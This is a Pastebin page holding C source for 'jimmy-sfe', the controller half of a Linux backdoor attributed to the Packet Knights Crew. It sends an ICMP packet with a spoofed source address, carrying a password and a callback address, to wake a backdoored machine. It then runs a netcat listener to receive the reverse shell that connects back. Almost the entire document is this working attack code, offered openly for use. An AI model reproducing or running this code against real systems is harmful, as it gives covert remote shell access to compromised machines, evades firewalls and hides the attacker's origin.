API tools faq
paste
Advertisement
FlyFar

jimmy-sfe.c

FlyFar
Jun 6th, 2023
656
1
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.64 KB | Cybersecurity | 1 0
raw download clone embed print report
  1. /*
  2.          Double Dragon Backdoor SFE (Special Firewall Edition)
  3.                 by tHE rECIdjVO <recidjvo@pkcrew.org>
  4.  
  5.                    Member of the Packet Knights Crew
  6.                         http://www.pkcrew.org/
  7.  
  8.                         ---> Player 2: Jimmy
  9.                                 */
  10.  
  11. // Set here the ICMP type
  12. #define ICMP_TYPE 0
  13.  
  14. #define PROGRAM "jimmy-sfe"
  15. #define AUTHOR "tHE rECIdjVO <recidjvo@pkcrew.org>"
  16.  
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19. #include <string.h>
  20. #include <netdb.h>
  21. #include <sys/types.h>
  22. #include <sys/socket.h>
  23. #include <netinet/in.h>
  24. #include <netinet/ip.h>
  25. #include <netinet/ip_icmp.h>
  26.  
  27. // Data to send
  28. struct cb_data{
  29.     char pass[30];
  30.     u_long jimmy_ip;
  31.     u_short jimmy_port;
  32. };
  33.  
  34. int main(int argc, char *argv[]);
  35. void send_icmp(char *argv[]);
  36. u_long resolv(char *hostname);
  37. u_short in_chksum(u_short *,int);
  38.  
  39. int main(int argc, char *argv[])
  40. {
  41.     char commandline[64];
  42.  
  43.     if(argc != 6) {
  44.         printf(PROGRAM " by " AUTHOR "\n");
  45.         printf("usage: %s <ranzou_addr> <ranzou_pass> <jimmy_ip> <jimmy_port> <spoofed_ip>\n", argv[0]);
  46.         exit(0);
  47.     }
  48.  
  49.     bzero(commandline, 64);
  50.     sprintf(commandline, "nc -l -p %s", argv[4]);
  51.     // Send ICMP packet to initialize the callback
  52.     send_icmp(argv);
  53.     // Run netcat to accept the callback connection
  54.     system(commandline);
  55.     exit(0);
  56. }
  57.  
  58. void send_icmp(char *argv[])
  59. {
  60.     struct cb_data *pdata;
  61.     struct ip *pip;
  62.     struct icmp *picmp;
  63.     struct sockaddr_in from;
  64.     int sock;
  65.     char *packet;
  66.     int hincl = 1;
  67.  
  68.     // Create the raw socket
  69.     if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
  70.         printf("socket() error.\nAre you really root?\n");
  71.         exit(1);
  72.     }
  73.     // Get privileges to modify the ip header
  74.     if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&hincl,sizeof(hincl)) < 0) {
  75.         printf("setsockopt() error.\n");
  76.         close(sock);
  77.         exit(1);
  78.     }
  79.  
  80.     // Set pointers
  81.     packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + 64);
  82.     pip = (struct ip *)packet;
  83.     picmp = (struct icmp *)(packet + sizeof(struct ip));
  84.     pdata = (struct cb_data *)(packet + sizeof(struct ip) + sizeof(struct icmp));
  85.     memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + 64);
  86.     // Initialize the ICMP fields
  87.     from.sin_addr.s_addr = resolv(argv[1]);
  88.     from.sin_family = AF_INET;
  89.     pip->ip_len = htons(sizeof(struct ip) + sizeof(struct icmp) + 64);
  90.     pip->ip_hl = 5;
  91.     pip->ip_v = 4;
  92.     pip->ip_ttl = 255;
  93.     pip->ip_tos = 0;
  94.     pip->ip_off = 0;
  95.     pip->ip_id = htons(getpid());
  96.     pip->ip_p = 1;
  97.     pip->ip_src.s_addr = resolv(argv[5]);
  98.     pip->ip_dst.s_addr = resolv(argv[1]);
  99.     pip->ip_sum = in_chksum((u_short *)pip,20);
  100.     picmp->icmp_type = ICMP_TYPE;
  101.     picmp->icmp_code = 0;
  102.     strcpy(pdata->pass, argv[2]);
  103.     pdata->jimmy_ip = resolv(argv[3]);
  104.     pdata->jimmy_port = atoi(argv[4]);
  105.     picmp->icmp_cksum = in_chksum((u_short *)picmp, sizeof(struct icmp) + 64);
  106.  
  107.     // Finally, send the packet
  108.     sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + 64, 0, (struct sockaddr *)&from ,sizeof(struct sockaddr_in));
  109. }
  110.  
  111. u_long resolv(char *hostname) {
  112.         // Resolve hostnames to IPv4
  113.  
  114.         u_long ipb;
  115.         struct hostent *hp;
  116.  
  117.         if((hp = gethostbyname(hostname)) == NULL) {
  118.                 return(0);
  119.         }
  120.         memcpy(&ipb, hp->h_addr, hp->h_length);
  121.         return(ipb);
  122. }
  123.  
  124. u_short in_chksum(u_short *ptr, int nbytes)
  125. {
  126.     // Checksum
  127.     register long sum;
  128.     u_short oddbyte;
  129.     register u_short answer;
  130.     sum = 0;
  131.     while(nbytes > 1) {
  132.         sum += *ptr++;
  133.         nbytes -= 2;
  134.     }
  135.     if (nbytes == 1) {
  136.         oddbyte = 0;
  137.         *((u_char *) &oddbyte) = *(u_char *)ptr;
  138.         sum += oddbyte;
  139.     }
  140.  
  141.     sum  = (sum >> 16) + (sum & 0xffff);
  142.     sum += (sum >> 16);
  143.     answer = ~sum;
  144.  
  145.     return((u_short) answer);
  146. }
Tags: Linux Backdoor
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!